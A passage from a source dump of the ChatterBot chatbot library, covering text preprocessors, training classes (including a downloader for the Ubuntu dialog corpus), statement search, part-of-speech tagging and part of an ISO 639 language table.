:rtype: float """ import time start_time = time.time() chatbot.get_response(statement) return time.time() - start_time def print_progress_bar(description, iteration_counter, total_items, progress_bar_length=20): """ Print progress bar :param description: Training description :type description: str :param iteration_counter: Incremental counter :type iteration_counter: int :param total_items: total number items :type total_items: int :param progress_bar_length: Progress bar length :type progress_bar_length: int :returns: void :rtype: void """ import sys percent = float(iteration_counter) / total_items hashes = '#' * int(round(percent * progress_bar_length)) spaces = ' ' * (progress_bar_length - len(hashes)) sys.stdout.write('\r{0}: [{1}] {2}%'.format(description, hashes + spaces, int(round(percent * 100)))) sys.stdout.flush() if total_items == iteration_counter: print('\r') File: chatterbot/preprocessors.py """ Statement pre-processors. """ def clean_whitespace(statement): """ Remove any consecutive whitespace characters from the statement text. """ import re # Replace linebreaks and tabs with spaces statement.text = statement.text.replace('\n', ' ').replace('\r', ' ').replace('\t', ' ') # Remove any leeding or trailing whitespace statement.text = statement.text.strip() # Remove consecutive spaces statement.text = re.sub(' +', ' ', statement.text) return statement def unescape_html(statement): """ Convert escaped html characters into unescaped html characters. For example: "&lt;b&gt;" becomes "<b>". """ import html statement.text = html.unescape(statement.text) return statement def convert_to_ascii(statement): """ Converts unicode characters to ASCII character equivalents. For example: "på fédéral" becomes "pa federal". """ import unicodedata text = unicodedata.normalize('NFKD', statement.text) text = text.encode('ascii', 'ignore').decode('utf-8') statement.text = str(text) return statement File: chatterbot/trainers.py import os import sys import csv import time from dateutil import parser as date_parser from chatterbot.conversation import Statement from chatterbot.tagging import PosLemmaTagger from chatterbot import utils class Trainer(object): """ Base class for all other trainer classes. :param boolean show_training_progress: Show progress indicators for the trainer. The environment variable ``CHATTERBOT_SHOW_TRAINING_PROGRESS`` can also be set to control this. ``show_training_progress`` will override the environment variable if it is set. """ def __init__(self, chatbot, **kwargs): self.chatbot = chatbot environment_default = os.getenv('CHATTERBOT_SHOW_TRAINING_PROGRESS', True) self.show_training_progress = kwargs.get( 'show_training_progress', environment_default ) def get_preprocessed_statement(self, input_statement): """ Preprocess the input statement. """ for preprocessor in self.chatbot.preprocessors: input_statement = preprocessor(input_statement) return input_statement def train(self, *args, **kwargs): """ This method must be overridden by a child class. """ raise self.TrainerInitializationException() class TrainerInitializationException(Exception): """ Exception raised when a base class has not overridden the required methods on the Trainer base class. """ def __init__(self, message=None): default = ( 'A training class must be specified before calling train(). 
' 'See http://chatterbot.readthedocs.io/en/stable/training.html' ) super().__init__(message or default) def _generate_export_data(self): result = [] for statement in self.chatbot.storage.filter(): if statement.in_response_to: result.append([statement.in_response_to, statement.text]) return result def export_for_training(self, file_path='./export.json'): """ Create a file from the database that can be used to train other chat bots. """ import json export = {'conversations': self._generate_export_data()} with open(file_path, 'w+', encoding='utf8') as jsonfile: json.dump(export, jsonfile, ensure_ascii=False) class ListTrainer(Trainer): """ Allows a chat bot to be trained using a list of strings where the list represents a conversation. """ def train(self, conversation): """ Train the chat bot based on the provided list of statements that represents a single conversation. """ previous_statement_text = None previous_statement_search_text = '' statements_to_create = [] for conversation_count, text in enumerate(conversation): if self.show_training_progress: utils.print_progress_bar( 'List Trainer', conversation_count + 1, len(conversation) ) statement_search_text = self.chatbot.storage.tagger.get_text_index_string(text) statement = self.get_preprocessed_statement( Statement( text=text, search_text=statement_search_text, in_response_to=previous_statement_text, search_in_response_to=previous_statement_search_text, conversation='training' ) ) previous_statement_text = statement.text previous_statement_search_text = statement_search_text statements_to_create.append(statement) self.chatbot.storage.create_many(statements_to_create) class ChatterBotCorpusTrainer(Trainer): """ Allows the chat bot to be trained using data from the ChatterBot dialog corpus. """ def train(self, *corpus_paths): from chatterbot.corpus import load_corpus, list_corpus_files data_file_paths = [] # Get the paths to each file the bot will be trained with for corpus_path in corpus_paths: data_file_paths.extend(list_corpus_files(corpus_path)) for corpus, categories, file_path in load_corpus(*data_file_paths): statements_to_create = [] # Train the chat bot with each statement and response pair for conversation_count, conversation in enumerate(corpus): if self.show_training_progress: utils.print_progress_bar( 'Training ' + str(os.path.basename(file_path)), conversation_count + 1, len(corpus) ) previous_statement_text = None previous_statement_search_text = '' for text in conversation: statement_search_text = self.chatbot.storage.tagger.get_text_index_string(text) statement = Statement( text=text, search_text=statement_search_text, in_response_to=previous_statement_text, search_in_response_to=previous_statement_search_text, conversation='training' ) statement.add_tags(*categories) statement = self.get_preprocessed_statement(statement) previous_statement_text = statement.text previous_statement_search_text = statement_search_text statements_to_create.append(statement) if statements_to_create: self.chatbot.storage.create_many(statements_to_create) class UbuntuCorpusTrainer(Trainer): """ Allow chatbots to be trained with the data from the Ubuntu Dialog Corpus. 
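
    A usage sketch (assuming ``bot`` is an existing ``ChatBot`` instance; the
    corpus download is large, so training can take a long time)::

        # bot is assumed to be an existing ChatBot instance
        trainer = UbuntuCorpusTrainer(bot)
        trainer.train()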
""" def __init__(self, chatbot, **kwargs): super().__init__(chatbot, **kwargs) home_directory = os.path.expanduser('~') self.data_download_url = kwargs.get( 'ubuntu_corpus_data_download_url', 'http://cs.mcgill.ca/~jpineau/datasets/ubuntu-corpus-1.0/ubuntu_dialogs.tgz' ) self.data_directory = kwargs.get( 'ubuntu_corpus_data_directory', os.path.join(home_directory, 'ubuntu_data') ) self.extracted_data_directory = os.path.join( self.data_directory, 'ubuntu_dialogs' ) # Create the data directory if it does not already exist if not os.path.exists(self.data_directory): os.makedirs(self.data_directory) def is_downloaded(self, file_path): """ Check if the data file is already downloaded. """ if os.path.exists(file_path): self.chatbot.logger.info('File is already downloaded') return True return False def is_extracted(self, file_path): """ Check if the data file is already extracted. """ if os.path.isdir(file_path): self.chatbot.logger.info('File is already extracted') return True return False def download(self, url, show_status=True): """ Download a file from the given url. Show a progress indicator for the download status. Based on: http://stackoverflow.com/a/15645088/1547223 """ import requests file_name = url.split('/')[-1] file_path = os.path.join(self.data_directory, file_name) # Do not download the data if it already exists if self.is_downloaded(file_path): return file_path with open(file_path, 'wb') as open_file: print('Downloading %s' % url) response = requests.get(url, stream=True) total_length = response.headers.get('content-length') if total_length is None: # No content length header open_file.write(response.content) else: download = 0 total_length = int(total_length) for data in response.iter_content(chunk_size=4096): download += len(data) open_file.write(data) if show_status: done = int(50 * download / total_length) sys.stdout.write('\r[%s%s]' % ('=' * done, ' ' * (50 - done))) sys.stdout.flush() # Add a new line after the download bar sys.stdout.write('\n') print('Download location: %s' % file_path) return file_path def extract(self, file_path): """ Extract a tar file at the specified file path. 
""" import tarfile print('Extracting {}'.format(file_path)) if not os.path.exists(self.extracted_data_directory): os.makedirs(self.extracted_data_directory) def track_progress(members): sys.stdout.write('.') for member in members: # This will be the current file being extracted yield member with tarfile.open(file_path) as tar: tar.extractall(path=self.extracted_data_directory, members=track_progress(tar)) self.chatbot.logger.info('File extracted to {}'.format(self.extracted_data_directory)) return True def train(self): import glob tagger = PosLemmaTagger(language=self.chatbot.storage.tagger.language) # Download and extract the Ubuntu dialog corpus if needed corpus_download_path = self.download(self.data_download_url) # Extract if the directory does not already exist if not self.is_extracted(self.extracted_data_directory): self.extract(corpus_download_path) extracted_corpus_path = os.path.join( self.extracted_data_directory, '**', '**', '*.tsv' ) def chunks(items, items_per_chunk): for start_index in range(0, len(items), items_per_chunk): end_index = start_index + items_per_chunk yield items[start_index:end_index] file_list = glob.glob(extracted_corpus_path) file_groups = tuple(chunks(file_list, 10000)) start_time = time.time() for tsv_files in file_groups: statements_from_file = [] for tsv_file in tsv_files: with open(tsv_file, 'r', encoding='utf-8') as tsv: reader = csv.reader(tsv, delimiter='\t') previous_statement_text = None previous_statement_search_text = '' for row in reader: if len(row) > 0: statement = Statement( text=row[3], in_response_to=previous_statement_text, conversation='training', created_at=date_parser.parse(row[0]), persona=row[1] ) for preprocessor in self.chatbot.preprocessors: statement = preprocessor(statement) statement.search_text = tagger.get_text_index_string(statement.text) statement.search_in_response_to = previous_statement_search_text previous_statement_text = statement.text previous_statement_search_text = statement.search_text statements_from_file.append(statement) self.chatbot.storage.create_many(statements_from_file) print('Training took', time.time() - start_time, 'seconds.') File: chatterbot/search.py class IndexedTextSearch: """ :param statement_comparison_function: A comparison class. Defaults to ``LevenshteinDistance``. :param search_page_size: The maximum number of records to load into memory at a time when searching. Defaults to 1000 """ name = 'indexed_text_search' def __init__(self, chatbot, **kwargs): from chatterbot.comparisons import LevenshteinDistance self.chatbot = chatbot statement_comparison_function = kwargs.get( 'statement_comparison_function', LevenshteinDistance ) self.compare_statements = statement_comparison_function( language=self.chatbot.storage.tagger.language ) self.search_page_size = kwargs.get( 'search_page_size', 1000 ) def search(self, input_statement, **additional_parameters): """ Search for close matches to the input. Confidence scores for subsequent results will order of increasing value. :param input_statement: A statement. :type input_statement: chatterbot.conversation.Statement :param **additional_parameters: Additional parameters to be passed to the ``filter`` method of the storage adapter when searching. :rtype: Generator yielding one closest matching statement at a time. 
""" self.chatbot.logger.info('Beginning search for close text match') input_search_text = input_statement.search_text if not input_statement.search_text: self.chatbot.logger.warn( 'No value for search_text was available on the provided input' ) input_search_text = self.chatbot.storage.tagger.get_text_index_string( input_statement.text ) search_parameters = { 'search_text_contains': input_search_text, 'persona_not_startswith': 'bot:', 'page_size': self.search_page_size } if additional_parameters: search_parameters.update(additional_parameters) statement_list = self.chatbot.storage.filter(**search_parameters) best_confidence_so_far = 0 self.chatbot.logger.info('Processing search results') # Find the closest matching known statement for statement in statement_list: confidence = self.compare_statements(input_statement, statement) if confidence > best_confidence_so_far: best_confidence_so_far = confidence statement.confidence = confidence self.chatbot.logger.info('Similar text found: {} {}'.format( statement.text, confidence )) yield statement class TextSearch: """ :param statement_comparison_function: A comparison class. Defaults to ``LevenshteinDistance``. :param search_page_size: The maximum number of records to load into memory at a time when searching. Defaults to 1000 """ name = 'text_search' def __init__(self, chatbot, **kwargs): from chatterbot.comparisons import LevenshteinDistance self.chatbot = chatbot statement_comparison_function = kwargs.get( 'statement_comparison_function', LevenshteinDistance ) self.compare_statements = statement_comparison_function( language=self.chatbot.storage.tagger.language ) self.search_page_size = kwargs.get( 'search_page_size', 1000 ) def search(self, input_statement, **additional_parameters): """ Search for close matches to the input. Confidence scores for subsequent results will order of increasing value. :param input_statement: A statement. :type input_statement: chatterbot.conversation.Statement :param **additional_parameters: Additional parameters to be passed to the ``filter`` method of the storage adapter when searching. :rtype: Generator yielding one closest matching statement at a time. """ self.chatbot.logger.info('Beginning search for close text match') search_parameters = { 'persona_not_startswith': 'bot:', 'page_size': self.search_page_size } if additional_parameters: search_parameters.update(additional_parameters) statement_list = self.chatbot.storage.filter(**search_parameters) best_confidence_so_far = 0 self.chatbot.logger.info('Processing search results') # Find the closest matching known statement for statement in statement_list: confidence = self.compare_statements(input_statement, statement) if confidence > best_confidence_so_far: best_confidence_so_far = confidence statement.confidence = confidence self.chatbot.logger.info('Similar text found: {} {}'.format( statement.text, confidence )) yield statement File: chatterbot/exceptions.py class OptionalDependencyImportError(ImportError): """ An exception raised when a feature requires an optional dependency to be installed. """ pass File: chatterbot/tagging.py import string from chatterbot import languages class LowercaseTagger(object): """ Returns the text in lowercase. 
""" def __init__(self, language=None): self.language = language or languages.ENG def get_text_index_string(self, text): return text.lower() class PosLemmaTagger(object): def __init__(self, language=None): import spacy self.language = language or languages.ENG self.punctuation_table = str.maketrans(dict.fromkeys(string.punctuation)) self.nlp = spacy.load(self.language.ISO_639_1.lower()) def get_text_index_string(self, text): """ Return a string of text containing part-of-speech, lemma pairs. """ bigram_pairs = [] if len(text) <= 2: text_without_punctuation = text.translate(self.punctuation_table) if len(text_without_punctuation) >= 1: text = text_without_punctuation document = self.nlp(text) if len(text) <= 2: bigram_pairs = [ token.lemma_.lower() for token in document ] else: tokens = [ token for token in document if token.is_alpha and not token.is_stop ] if len(tokens) < 2: tokens = [ token for token in document if token.is_alpha ] for index in range(1, len(tokens)): bigram_pairs.append('{}:{}'.format( tokens[index - 1].pos_, tokens[index].lemma_.lower() )) if not bigram_pairs: bigram_pairs = [ token.lemma_.lower() for token in document ] return ' '.join(bigram_pairs) File: chatterbot/languages.py class AAR: ISO_639_1 = '' ISO_639 = 'aar' ENGLISH_NAME = 'Afar' class ABK: ISO_639_1 = '' ISO_639 = 'abk' ENGLISH_NAME = 'Abkhazian' class ACE: ISO_639_1 = '' ISO_639 = 'ace' ENGLISH_NAME = 'Achinese' class ACH: ISO_639_1 = '' ISO_639 = 'ach' ENGLISH_NAME = 'Acoli' class ADA: ISO_639_1 = '' ISO_639 = 'ada' ENGLISH_NAME = 'Adangme' class ADY: ISO_639_1 = '' ISO_639 = 'ady' ENGLISH_NAME = 'Adyghe' class AFH: ISO_639_1 = '' ISO_639 = 'afh' ENGLISH_NAME = 'Afrihili' class AFR: ISO_639_1 = '' ISO_639 = 'afr' ENGLISH_NAME = 'Afrikaans' class AIN: ISO_639_1 = '' ISO_639 = 'ain' ENGLISH_NAME = 'Ainu' class AKA: ISO_639_1 = '' ISO_639 = 'aka' ENGLISH_NAME = 'Akan' class AKK: ISO_639_1 = '' ISO_639 = 'akk' ENGLISH_NAME = 'Akkadian' class ALB: ISO_639_1 = '' ISO_639 = 'alb' ENGLISH_NAME = 'Albanian' class ALE: ISO_639_1 = '' ISO_639 = 'ale' ENGLISH_NAME = 'Aleut' class ALT: ISO_639_1 = '' ISO_639 = 'alt' ENGLISH_NAME = 'SouthernAltai' class AMH: ISO_639_1 = '' ISO_639 = 'amh' ENGLISH_NAME = 'Amharic' class ANP: ISO_639_1 = '' ISO_639 = 'anp' ENGLISH_NAME = 'Angika' class ARA: ISO_639_1 = '' ISO_639 = 'ara' ENGLISH_NAME = 'Arabic' class ARG: ISO_639_1 = '' ISO_639 = 'arg' ENGLISH_NAME = 'Aragonese' class ARM: ISO_639_1 = '' ISO_639 = 'arm' ENGLISH_NAME = 'Armenian' class ARN: ISO_639_1 = '' ISO_639 = 'arn' ENGLISH_NAME = 'Mapudungun' class ARP: ISO_639_1 = '' ISO_639 = 'arp' ENGLISH_NAME = 'Arapaho' class ARW: ISO_639_1 = '' ISO_639 = 'arw' ENGLISH_NAME = 'Arawak' class ASM: ISO_639_1 = '' ISO_639 = 'asm' ENGLISH_NAME = 'Assamese' class AST: ISO_639_1 = '' ISO_639 = 'ast' ENGLISH_NAME = 'Asturian' class AVA: ISO_639_1 = '' ISO_639 = 'ava' ENGLISH_NAME = 'Avaric' class AVE: ISO_639_1 = '' ISO_639 = 'ave' ENGLISH_NAME = 'Avestan' class AWA: ISO_639_1 = '' ISO_639 = 'awa' ENGLISH_NAME = 'Awadhi' class AYM: ISO_639_1 = '' ISO_639 = 'aym' ENGLISH_NAME = 'Aymara' class AZE: ISO_639_1 = '' ISO_639 = 'aze' ENGLISH_NAME = 'Azerbaijani' class BAK: ISO_639_1 = '' ISO_639 = 'bak' ENGLISH_NAME = 'Bashkir' class BAL: ISO_639_1 = '' ISO_639 = 'bal' ENGLISH_NAME = 'Baluchi' class BAM: ISO_639_1 = '' ISO_639 = 'bam' ENGLISH_NAME = 'Bambara' class BAN: ISO_639_1 = '' ISO_639 = 'ban' ENGLISH_NAME = 'Balinese' class BAQ: ISO_639_1 = '' ISO_639 = 'baq' ENGLISH_NAME = 'Basque' class BAS: ISO_639_1 = '' ISO_639 = 'bas' 
ENGLISH_NAME = 'Basa' class BEJ: ISO_639_1 = '' ISO_639 = 'bej' ENGLISH_NAME = 'Beja' class BEL: ISO_639_1 = '' ISO_639 = 'bel' ENGLISH_NAME = 'Belarusian' class BEM: ISO_639_1 = '' ISO_639 = 'bem' ENGLISH_NAME = 'Bemba' class BEN: ISO_639_1 = 'bn' ISO_639 = 'ben' ENGLISH_NAME = 'Bengali' class BHO: ISO_639_1 = '' ISO_639 = 'bho' ENGLISH_NAME = 'Bhojpuri' class BIK: ISO_639_1 = '' ISO_639 = 'bik' ENGLISH_NAME = 'Bikol' class BIN: ISO_639_1 = '' ISO_639 = 'bin' ENGLISH_NAME = 'Bini' class BIS: ISO_639_1 = '' ISO_639 = 'bis' ENGLISH_NAME = 'Bislama' class BLA: ISO_639_1 = '' ISO_639 = 'bla' ENGLISH_NAME = 'Siksika' class BOS: ISO_639_1 = '' ISO_639 = 'bos' ENGLISH_NAME = 'Bosnian' class BRA: ISO_639_1 = '' ISO_639 = 'bra' ENGLISH_NAME = 'Braj' class BRE: ISO_639_1 = '' ISO_639 = 'bre' ENGLISH_NAME = 'Breton' class BUA: ISO_639_1 = '' ISO_639 = 'bua' ENGLISH_NAME = 'Buriat' class BUG: ISO_639_1 = '' ISO_639 = 'bug' ENGLISH_NAME = 'Buginese' class BUL: ISO_639_1 = '' ISO_639 = 'bul' ENGLISH_NAME = 'Bulgarian' class BUR: ISO_639_1 = '' ISO_639 = 'bur' ENGLISH_NAME = 'Burmese' class BYN: ISO_639_1 = '' ISO_639 = 'byn' ENGLISH_NAME = 'Blin' class CAD: ISO_639_1 = '' ISO_639 = 'cad' ENGLISH_NAME = 'Caddo' class CAR: ISO_639_1 = '' ISO_639 = 'car' ENGLISH_NAME = 'GalibiCarib' class CAT: ISO_639_1 = '' ISO_639 = 'cat' ENGLISH_NAME = 'Catalan' class CEB: ISO_639_1 = '' ISO_639 = 'ceb' ENGLISH_NAME = 'Cebuano' class CHA: ISO_639_1 = '' ISO_639 = 'cha' ENGLISH_NAME = 'Chamorro' class CHB: ISO_639_1 = '' ISO_639 = 'chb' ENGLISH_NAME = 'Chibcha' class CHE: ISO_639_1 = '' ISO_639 = 'che' ENGLISH_NAME = 'Chechen' class CHG: ISO_639_1 = '' ISO_639 = 'chg' ENGLISH_NAME = 'Chagatai' class CHI: ISO_639_1 = 'zh' ISO_639 = 'chi' ENGLISH_NAME = 'Chinese' class CHK: ISO_639_1 = '' ISO_639 = 'chk' ENGLISH_NAME = 'Chuukese' class CHM: ISO_639_1 = '' ISO_639 = 'chm' ENGLISH_NAME = 'Mari' class CHN: ISO_639_1 = '' ISO_639 = 'chn' ENGLISH_NAME = 'Chinookjargon' class CHO: ISO_639_1 = '' ISO_639 = 'cho' ENGLISH_NAME = 'Choctaw' class CHP: ISO_639_1 = '' ISO_639 = 'chp' ENGLISH_NAME = 'Chipewyan' class CHR: ISO_639_1 = '' ISO_639 = 'chr' ENGLISH_NAME = 'Cherokee' class CHV: ISO_639_1 = '' ISO_639 = 'chv' ENGLISH_NAME = 'Chuvash' class CHY: ISO_639_1 = '' ISO_639 = 'chy' ENGLISH_NAME = 'Cheyenne' class CNR: ISO_639_1 = '' ISO_639 = 'cnr' ENGLISH_NAME = 'Montenegrin' class COP: ISO_639_1 = '' ISO_639 = 'cop' ENGLISH_NAME = 'Coptic' class COR: ISO_639_1 = '' ISO_639 = 'cor' ENGLISH_NAME = 'Cornish' class COS: ISO_639_1 = '' ISO_639 = 'cos' ENGLISH_NAME = 'Corsican' class CPE: ISO_639_1 = '' ISO_639 = 'cpe' ENGLISH_NAME = 'Creolesandpidgins' class CPF: ISO_639_1 = '' ISO_639 = 'cpf' ENGLISH_NAME = 'Creolesandpidgins' class CPP: ISO_639_1 = '' ISO_639 = 'cpp' ENGLISH_NAME = 'Creolesandpidgins' class CRE: ISO_639_1 = '' ISO_639 = 'cre' ENGLISH_NAME = 'Cree' class CRH: ISO_639_1 = '' ISO_639 = 'crh' ENGLISH_NAME = 'CrimeanTatar' class CRP: ISO_639_1 = '' ISO_639 = 'crp' ENGLISH_NAME = 'Creolesandpidgins' class CSB: ISO_639_1 = '' ISO_639 = 'csb' ENGLISH_NAME = 'Kashubian' class CZE: ISO_639_1 = '' ISO_639 = 'cze' ENGLISH_NAME = 'Czech' class DAK: ISO_639_1 = '' ISO_639 = 'dak' ENGLISH_NAME = 'Dakota' class DAN: ISO_639_1 = '' ISO_639 = 'dan' ENGLISH_NAME = 'Danish' class DAR: ISO_639_1 = '' ISO_639 = 'dar' ENGLISH_NAME = 'Dargwa' class DEL: ISO_639_1 = '' ISO_639 = 'del' ENGLISH_NAME = 'Delaware' class DEN: ISO_639_1 = '' ISO_639 = 'den' ENGLISH_NAME = 'Slave' class DGR: ISO_639_1 = '' ISO_639 = 'dgr' ENGLISH_NAME = 'Dogrib' 
class DIN: ISO_639_1 = '' ISO_639 = 'din' ENGLISH_NAME = 'Dinka' class DIV: ISO_639_1 = '' ISO_639 = 'div' ENGLISH_NAME = 'Divehi' class DOI: ISO_639_1 = '' ISO_639 = 'doi' ENGLISH_NAME = 'Dogri' class DUA: ISO_639_1 = '' ISO_639 = 'dua' ENGLISH_NAME = 'Duala' class DUT: ISO_639_1 = 'nl' ISO_639 = 'dut' ENGLISH_NAME = 'Dutch' class DYU: ISO_639_1 = '' ISO_639 = 'dyu' ENGLISH_NAME = 'Dyula' class DZO: ISO_639_1 = '' ISO_639 = 'dzo' ENGLISH_NAME = 'Dzongkha' class EFI: ISO_639_1 = '' ISO_639 = 'efi' ENGLISH_NAME = 'Efik' class EKA: ISO_639_1 = '' ISO_639 = 'eka' ENGLISH_NAME = 'Ekajuk' class ELX: ISO_639_1 = '' ISO_639 = 'elx' ENGLISH_NAME = 'Elamite' class ENG: ISO_639_1 = 'en' ISO_639 = 'eng' ENGLISH_NAME = 'English' class EPO: ISO_639_1 = '' ISO_639 = 'epo' ENGLISH_NAME = 'Esperanto' class EST: ISO_639_1 = '' ISO_639 = 'est' ENGLISH_NAME = 'Estonian' class EWE: ISO_639_1 = '' ISO_639 = 'ewe' ENGLISH_NAME = 'Ewe' class EWO: ISO_639_1 = '' ISO_639 = 'ewo' ENGLISH_NAME = 'Ewondo' class FAN: ISO_639_1 = '' ISO_639 = 'fan' ENGLISH_NAME = 'Fang' class FAO: ISO_639_1 = '' ISO_639 = 'fao' ENGLISH_NAME = 'Faroese' class FAT: ISO_639_1 = '' ISO_639 = 'fat' ENGLISH_NAME = 'Fanti' class FIJ: ISO_639_1 = '' ISO_639 = 'fij' ENGLISH_NAME = 'Fijian' class FIL: ISO_639_1 = '' ISO_639 = 'fil' ENGLISH_NAME = 'Filipino' class FIN: ISO_639_1 = '' ISO_639 = 'fin' ENGLISH_NAME = 'Finnish' class FON: ISO_639_1 = '' ISO_639 = 'fon' ENGLISH_NAME = 'Fon' class FRE: ISO_639_1 = '' ISO_639 = 'fre' ENGLISH_NAME = 'French' class FRR: ISO_639_1 = '' ISO_639 = 'frr' ENGLISH_NAME = 'NorthernFrisian' class FRS: ISO_639_1 = '' ISO_639 = 'frs' ENGLISH_NAME = 'EasternFrisian' class FRY: ISO_639_1 = '' ISO_639 = 'fry' ENGLISH_NAME = 'WesternFrisian' class FUL: ISO_639_1 = '' ISO_639 = 'ful' ENGLISH_NAME = 'Fulah' class FUR: ISO_639_1 = '' ISO_639 = 'fur' ENGLISH_NAME = 'Friulian' class GAA: ISO_639_1 = '' ISO_639 = 'gaa' ENGLISH_NAME = 'Ga' class GAY: ISO_639_1 = '' ISO_639 = 'gay' ENGLISH_NAME = 'Gayo' class GBA: ISO_639_1 = '' ISO_639 = 'gba' ENGLISH_NAME = 'Gbaya' class GEO: ISO_639_1 = '' ISO_639 = 'geo' ENGLISH_NAME = 'Georgian' class GER: ISO_639_1 = 'de' ISO_639 = 'ger' ENGLISH_NAME = 'German' class GEZ: ISO_639_1 = '' ISO_639 = 'gez' ENGLISH_NAME = 'Geez' class GIL: ISO_639_1 = '' ISO_639 = 'gil' ENGLISH_NAME = 'Gilbertese' class GLA: ISO_639_1 = '' ISO_639 = 'gla' ENGLISH_NAME = 'Gaelic' class GLE: ISO_639_1 = '' ISO_639 = 'gle' ENGLISH_NAME = 'Irish' class GLG: ISO_639_1 = '' ISO_639 = 'glg' ENGLISH_NAME = 'Galician' class GLV: ISO_639_1 = '' ISO_639 = 'glv' ENGLISH_NAME = 'Manx' class GON: ISO_639_1 = '' ISO_639 = 'gon' ENGLISH_NAME = 'Gondi' class GOR: ISO_639_1 = '' ISO_639 = 'gor' ENGLISH_NAME = 'Gorontalo' class GOT: ISO_639_1 = '' ISO_639 = 'got' ENGLISH_NAME = 'Gothic' class GRB: ISO_639_1 = '' ISO_639 = 'grb' ENGLISH_NAME = 'Grebo' class GRE: ISO_639_1 = 'el' ISO_639 = 'gre' ENGLISH_NAME = 'Greek' class GRN: ISO_639_1 = '' ISO_639 = 'grn' ENGLISH_NAME = 'Guarani' class GSW: ISO_639_1 = '' ISO_639 = 'gsw' ENGLISH_NAME = 'SwissGerman' class GUJ: ISO_639_1 = '' ISO_639 = 'guj' ENGLISH_NAME = 'Gujarati' class GWI: ISO_639_1 = '' ISO_639 = 'gwi' ENGLISH_NAME = 'Gwichin' class HAI: ISO_639_1 = '' ISO_639 = 'hai' ENGLISH_NAME = 'Haida' class HAT: ISO_639_1 = '' ISO_639 = 'hat' ENGLISH_NAME = 'Haitian' class HAU: ISO_639_1 = '' ISO_639 = 'hau' ENGLISH_NAME = 'Hausa' class HAW: ISO_639_1 = '' ISO_639 = 'haw' ENGLISH_NAME = 'Hawaiian' class HEB: ISO_639_1 = 'he' ISO_639 = 'heb' ENGLISH_NAME = 'Hebrew' class HER: 
ISO_639_1 = '' ISO_639 = 'her' ENGLISH_NAME = 'Herero' class HIL: ISO_639_1 = '' ISO_639 = 'hil' ENGLISH_NAME = 'Hiligaynon' class HIN: ISO_639_1 = 'hi' ISO_639 = 'hin' ENGLISH_NAME = 'Hindi' class HIT: ISO_639_1 = '' ISO_639 = 'hit' ENGLISH_NAME = 'Hittite' class HMN: ISO_639_1 = '' ISO_639 = 'hmn' ENGLISH_NAME = 'Hmong' class HMO: ISO_639_1 = '' ISO_639 = 'hmo' ENGLISH_NAME = 'HiriMotu' class HRV: ISO_639_1 = '' ISO_639 = 'hrv' ENGLISH_NAME = 'Croatian' class HSB: ISO_639_1 = '' ISO_639 = 'hsb' ENGLISH_NAME = 'UpperSorbian' class HUN: ISO_639_1 = '' ISO_639 = 'hun' ENGLISH_NAME = 'Hungarian' class HUP: ISO_639_1 = '' ISO_639 = 'hup' ENGLISH_NAME = 'Hupa' class IBA: ISO_639_1 = '' ISO_639 = 'iba' ENGLISH_NAME = 'Iban' class IBO: ISO_639_1 = '' ISO_639 = 'ibo' ENGLISH_NAME = 'Igbo' class ICE: ISO_639_1 = '' ISO_639 = 'ice' ENGLISH_NAME = 'Icelandic' class IDO: ISO_639_1 = '' ISO_639 = 'ido' ENGLISH_NAME = 'Ido' class III: ISO_639_1 = '' ISO_639 = 'iii' ENGLISH_NAME = 'SichuanYi' class IKU: ISO_639_1 = '' ISO_639 = 'iku' ENGLISH_NAME = 'Inuktitut' class ILE: ISO_639_1 = '' ISO_639 = 'ile' ENGLISH_NAME = 'Interlingue' class ILO: ISO_639_1 = '' ISO_639 = 'ilo' ENGLISH_NAME = 'Iloko' class INA: ISO_639_1 = '' ISO_639 = 'ina' ENGLISH_NAME = 'Interlingua' class IND: ISO_639_1 = 'id' ISO_639 = 'ind' ENGLISH_NAME = 'Indonesian' class INH: ISO_639_1 = '' ISO_639 = 'inh' ENGLISH_NAME = 'Ingush' class IPK: ISO_639_1 = '' ISO_639 = 'ipk' ENGLISH_NAME = 'Inupiaq' class ITA: ISO_639_1 = '' ISO_639 = 'ita' ENGLISH_NAME = 'Italian' class JAV: ISO_639_1 = '' ISO_639 = 'jav' ENGLISH_NAME = 'Javanese' class JBO: ISO_639_1 = '' ISO_639 = 'jbo' ENGLISH_NAME = 'Lojban' class JPN: ISO_639_1 = 'ja' ISO_639 = 'jpn' ENGLISH_NAME = 'Japanese' class JPR: ISO_639_1 = '' ISO_639 = 'jpr' ENGLISH_NAME = 'JudeoPersian' class JRB: ISO_639_1 = '' ISO_639 = 'jrb' ENGLISH_NAME = 'JudeoArabic' class KAA: ISO_639_1 = '' ISO_639 = 'kaa' ENGLISH_NAME = 'KaraKalpak' class KAB: ISO_639_1 = '' ISO_639 = 'kab' ENGLISH_NAME = 'Kabyle' class KAC: ISO_639_1 = '' ISO_639 = 'kac' ENGLISH_NAME = 'Kachin' class KAL: ISO_639_1 = '' ISO_639 = 'kal' ENGLISH_NAME = 'Kalaallisut' class KAM: ISO_639_1 = '' ISO_639 = 'kam' ENGLISH_NAME = 'Kamba' class KAN: ISO_639_1 = '' ISO_639 = 'kan' ENGLISH_NAME = 'Kannada' class KAS: ISO_639_1 = '' ISO_639 = 'kas' ENGLISH_NAME = 'Kashmiri' class KAU: ISO_639_1 = '' ISO_639 = 'kau' ENGLISH_NAME = 'Kanuri' class KAW: ISO_639_1 = '' ISO_639 = 'kaw' ENGLISH_NAME = 'Kawi' class KAZ: ISO_639_1 = '' ISO_639 = 'kaz' ENGLISH_NAME = 'Kazakh' class KBD: ISO_639_1 = '' ISO_639 = 'kbd' ENGLISH_NAME = 'Kabardian' class KHA: ISO_639_1 = '' ISO_639 = 'kha' ENGLISH_NAME = 'Khasi' class KHM: ISO_639_1 = '' ISO_639 = 'khm' ENGLISH_NAME = 'CentralKhmer' class KHO: ISO_639_1 = '' ISO_639 = 'kho' ENGLISH_NAME = 'Khotanese' class KIK: ISO_639_1 = '' ISO_639 = 'kik' ENGLISH_NAME = 'Kikuyu' class KIN: ISO_639_1 = '' ISO_639 = 'kin' ENGLISH_NAME = 'Kinyarwanda' class KIR: ISO_639_1 = '' ISO_639 = 'kir' ENGLISH_NAME = 'Kirghiz' class KMB: ISO_639_1 = '' ISO_639 = 'kmb' ENGLISH_NAME = 'Kimbundu' class KOK: ISO_639_1 = '' ISO_639 = 'kok' ENGLISH_NAME = 'Konkani' class KOM: ISO_639_1 = '' ISO_639 = 'kom' ENGLISH_NAME = 'Komi' class KON: ISO_639_1 = '' ISO_639 = 'kon' ENGLISH_NAME = 'Kongo' class KOR: ISO_639_1 = 'ko' ISO_639 = 'kor' ENGLISH_NAME = 'Korean' class KOS: ISO_639_1 = '' ISO_639 = 'kos' ENGLISH_NAME = 'Kosraean' class KPE: 